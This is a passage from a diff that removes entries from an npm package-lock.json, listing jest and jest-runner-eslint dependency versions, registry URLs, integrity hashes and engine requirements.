} - }, - "node_modules/jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util/node_modules/@babel/code-frame": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.18.6.tgz", - "integrity": "sha512-TDCmlK5eOvH+eH7cdAFlNXeVJqWIQ7gW9tY1GJIpUtFb6CmjVyq2VM3u71bOyR8CRihcCgMUYoDNyLXao3+70Q==", - "dev": true, - "dependencies": { - "@babel/highlight": "^7.18.6" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner-eslint": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/jest-runner-eslint/-/jest-runner-eslint-2.2.1.tgz", - "integrity": "sha512-BSAB65hGhtr/Kmb7tSkfqFmK9LYwCMK8L1xcp+XaSToPFqr7sY1jleMZUeDhV0ITA33pW+JUCx5a02veVD2Q2w==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "cosmiconfig": "^7.0.0", - "create-jest-runner": "^0.11.2", - "dot-prop": "^6.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "eslint": "^7 || ^8", - "jest": "^27 || ^28 || ^29" - } - }, - "node_modules/jest-runner-eslint/node_modules/@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/console": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-28.1.3.tgz", - "integrity": "sha512-QPAkP5EwKdK/bxIr6C1I4Vs0rm2nHiANzj/Z5X2JQkrZo6IqvC4ldZ9K95tF0HdidhA8Bo6egxSzUFPYKcEXLw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/environment": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-28.1.3.tgz", - "integrity": "sha512-1bf40cMFTEkKyEf585R9Iz1WayDjHoHqvts0XFYEqyKM3cFWDpeMoqKKTAF9LSYQModPUlh8FKptoM2YcMWAXA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-lzc8CpUbSoE4dqT0U+g1qODQjBRHPpCPXissXD4mS9+sWQdmmpeJ9zSH1rS1HEkrsMN0fb7nKrJ9giAR1d3wBw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "expect": "^28.1.3", - "jest-snapshot": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/expect-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-28.1.3.tgz", - "integrity": "sha512-wvbi9LUrHJLn3NlDW6wF2hvIMtd4JUl2QNVrjq+IBSHirgfrR3o9RnVtxzdEGO2n9JyIWwHnLfby5KzqBGg2YA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "jest-get-type": "^28.0.2" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/fake-timers": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-28.1.3.tgz", - "integrity": "sha512-D/wOkL2POHv52h+ok5Oj/1gOG9HSywdoPtFsRCUmlCILXNn5eIWmcnd3DIiWlJnpGvQtmajqBP95Ei0EimxfLw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@sinonjs/fake-timers": "^9.1.2", - "@types/node": "*", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/globals": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-28.1.3.tgz", - "integrity": "sha512-XFU4P4phyryCXu1pbcqMO0GSQcYe1IsalYCDzRNyhetyeyxMcIxa11qPNDpVNLeretItNqEmYYQn1UYz/5x1NA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/expect": "^28.1.3", - "@jest/types": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/schemas": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-28.1.3.tgz", - "integrity": "sha512-/l/VWsdt/aBXgjshLWOFyFt3IVdYypu5y2Wn2rOO1un6nkqIn8SLXzgIMYXFyYsRWDyF5EthmKJMIdJvk08grg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@sinclair/typebox": "^0.24.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/source-map": { - "version": "28.1.2", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-28.1.2.tgz", - "integrity": "sha512-cV8Lx3BeStJb8ipPHnqVw/IM2VCMWO3crWZzYodSIkxXnRcXJipCdx1JCK0K5MsJJouZQTH73mzf4vgxRaH9ww==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.13", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/test-result": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-28.1.3.tgz", - "integrity": "sha512-kZAkxnSE+FqE8YjW8gNuoVkkC9I7S1qmenl8sGcDOLropASP+BkcGKwhXoyqQuGOGeYY0y/ixjrd/iERpEXHNg==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/console": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/transform": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-28.1.3.tgz", - "integrity": "sha512-u5dT5di+oFI6hfcLOHGTAfmUxFRrjK+vnaP0kkVow9Md/M7V/MxqQMOz/VV25UZO8pzeA9PjfTpOu6BDuwSPQA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^28.1.3", - "@jridgewell/trace-mapping": "^0.3.13", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^1.4.0", - "fast-json-stable-stringify": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.1" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@jest/types": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-28.1.3.tgz", - "integrity": "sha512-RyjiyMUZrKz/c+zlMFO1pm70DcIlST8AeWTkoUdZevew44wcNZQHsEVOiCVtgVnlFFD82FPaXycys58cf2muVQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/schemas": "^28.1.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/@sinclair/typebox": { - "version": "0.24.51", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.24.51.tgz", - "integrity": "sha512-1P1OROm/rdubP5aFDSZQILU0vrLCJ4fvHt6EoqHEM+2D/G5MK3bIaymUKLit8Js9gbns5UyJnkP/TZROLw4tUA==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/jest-runner-eslint/node_modules/@sinonjs/commons": { - "version": "1.8.6", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-1.8.6.tgz", - "integrity": "sha512-Ky+XkAkqPZSm3NLBeUng77EBQl3cmeJhITaGHdYH8kjVB+aun3S4XBRti2zt17mtt0mIUDiNxYeoJm6drVvBJQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/jest-runner-eslint/node_modules/@sinonjs/fake-timers": { - "version": "9.1.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-9.1.2.tgz", - "integrity": "sha512-BPS4ynJW/o92PUR4wgriz2Ud5gpST5vz6GQfMixEDK0Z8ZCUv2M7SkBLykH56T++Xs+8ln9zTGbOvNGIe02/jw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@sinonjs/commons": "^1.7.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/jest-runner-eslint/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-runner-eslint/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/jest-runner-eslint/node_modules/create-jest-runner": { - "version": "0.11.2", - "resolved": "https://registry.npmjs.org/create-jest-runner/-/create-jest-runner-0.11.2.tgz", - "integrity": "sha512-6lwspphs4M1PLKV9baBNxHQtWVBPZuDU8kAP4MyrVWa6aEpEcpi2HZeeA6WncwaqgsGNXpP0N2STS7XNM/nHKQ==", - "dev": true, - "dependencies": { - "chalk": "^4.1.0", - "jest-worker": "^28.0.2", - "throat": "^6.0.1" - }, - "bin": { - "create-jest-runner": "generator/index.js" - }, - "peerDependencies": { - "@jest/test-result": "^28.0.0", - "jest-runner": "^28.0.0" - }, - "peerDependenciesMeta": { - "@jest/test-result": { - "optional": true - }, - "jest-runner": { - "optional": true - } - } - }, - "node_modules/jest-runner-eslint/node_modules/diff-sequences": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-28.1.1.tgz", - "integrity": "sha512-FU0iFaH/E23a+a718l8Qa/19bF9p06kgE0KipMOMadwa3SjnaElKzPaUC0vnibs6/B/9ni97s61mcejk8W1fQw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/emittery": { - "version": "0.10.2", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.10.2.tgz", - "integrity": "sha512-aITqOwnLanpHLNXZJENbOgjUBeHocD+xsSJmNrjovKBW5HbSpW3d1pEls7GFQPUWXiwG9+0P4GtHfEqC/4M0Iw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/jest-runner-eslint/node_modules/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-eEh0xn8HlsuOBxFgIss+2mX85VAS4Qy3OSkjV7rlBWljtA4oWH37glVGyOZSZvErDT/yBywZdPGwCXuTvSG85g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/expect-utils": "^28.1.3", - "jest-get-type": "^28.0.2", - "jest-matcher-utils": "^28.1.3", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-diff": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-28.1.3.tgz", - "integrity": "sha512-8RqP1B/OXzjjTWkqMX67iqgwBVJRgCyKD3L9nq+6ZqJMdvjE8RgHktqZ6jNrkdMT+dJuYNI3rhQpxaz7drJHfw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^28.1.1", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-docblock": { - "version": "28.1.1", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-28.1.1.tgz", - "integrity": "sha512-3wayBVNiOYx0cwAbl9rwm5kKFP8yHH3d/fkEaL02NPTkDojPtheGB7HZSFY4wzX+DxyrvhXz0KSCVksmCknCuA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-environment-node": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-28.1.3.tgz", - "integrity": "sha512-ugP6XOhEpjAEhGYvp5Xj989ns5cB1K6ZdjBYuS30umT4CQEETaxSiPcZ/E1kFktX4GkrcM4qu07IIlDYX1gp+A==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/environment": "^28.1.3", - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-get-type": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-28.0.2.tgz", - "integrity": "sha512-ioj2w9/DxSYHfOm5lJKCdcAmPJzQXmbM/Url3rhlghrPvT3tt+7a/+oXc9azkKmLvoiXjtV83bEWqi+vs5nlPA==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-haste-map": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-28.1.3.tgz", - "integrity": "sha512-3S+RQWDXccXDKSWnkHa/dPwt+2qwA8CJzR61w3FoYCvoo3Pn8tvGcysmMF0Bj0EX5RYvAI2EIvC57OmotfdtKA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^28.0.2", - "jest-util": "^28.1.3", - "jest-worker": "^28.1.3", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-leak-detector": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-28.1.3.tgz", - "integrity": "sha512-WFVJhnQsiKtDEo5lG2mM0v40QWnBM+zMdHHyJs8AWZ7J0QZJS59MsyKeJHWhpBZBH32S48FOVvGyOFT1h0DlqA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-matcher-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-28.1.3.tgz", - "integrity": "sha512-kQeJ7qHemKfbzKoGjHHrRKH6atgxMk8Enkk2iPQ3XwO6oE/KYD8lMYOziCkeSB9G4adPM4nR1DE8Tf5JeWH6Bw==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^28.1.3", - "jest-get-type": "^28.0.2", - "pretty-format": "^28.1.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-message-util": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-28.1.3.tgz", - "integrity": "sha512-PFdn9Iewbt575zKPf1286Ht9EPoJmYT7P0kY+RibeYZ2XtOr53pDLEFoTWXbd1h4JiGiWpTBC84fc8xMXQMb7g==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^28.1.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^28.1.3", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-mock": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-28.1.3.tgz", - "integrity": "sha512-o3J2jr6dMMWYVH4Lh/NKmDXdosrsJgi4AviS8oXLujcjpCMBb1FMsblDnOXKZKfSiHLxYub1eS0IHuRXsio9eA==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "@jest/types": "^28.1.3", - "@types/node": "*" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-regex-util": { - "version": "28.0.2", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-28.0.2.tgz", - "integrity": "sha512-4s0IgyNIy0y9FK+cjoVYoxamT7Zeo7MhzqRGx7YDYmaQn1wucY9rotiGkBzzcMXTtjrCAP/f7f+E0F7+fxPNdw==", - "dev": true, - "optional": true, - "peer": true, - "engines": { - "node": "^12.13.0 || ^14.15.0 || ^16.10.0 || >=17.0.0" - } - }, - "node_modules/jest-runner-eslint/node_modules/jest-resolve": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-28.1.3.tgz", - "integrity": "sha512-Z1W3tTjE6QaNI90qo/BJpfnvpxtaFTFw5CDgwpyE/Kz8U/06N1Hjf4ia9quUhCh39qIGWF1ZuxFiBiJQwSEYKQ==", - "dev": true, - "optional": true, - "peer": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^28.1.3", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^28.1.3", - "jest-validate": "^28.1.3", - "resolve": "^1.20.0", - "resolve.exports": "^1.1.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^12.13.0 || 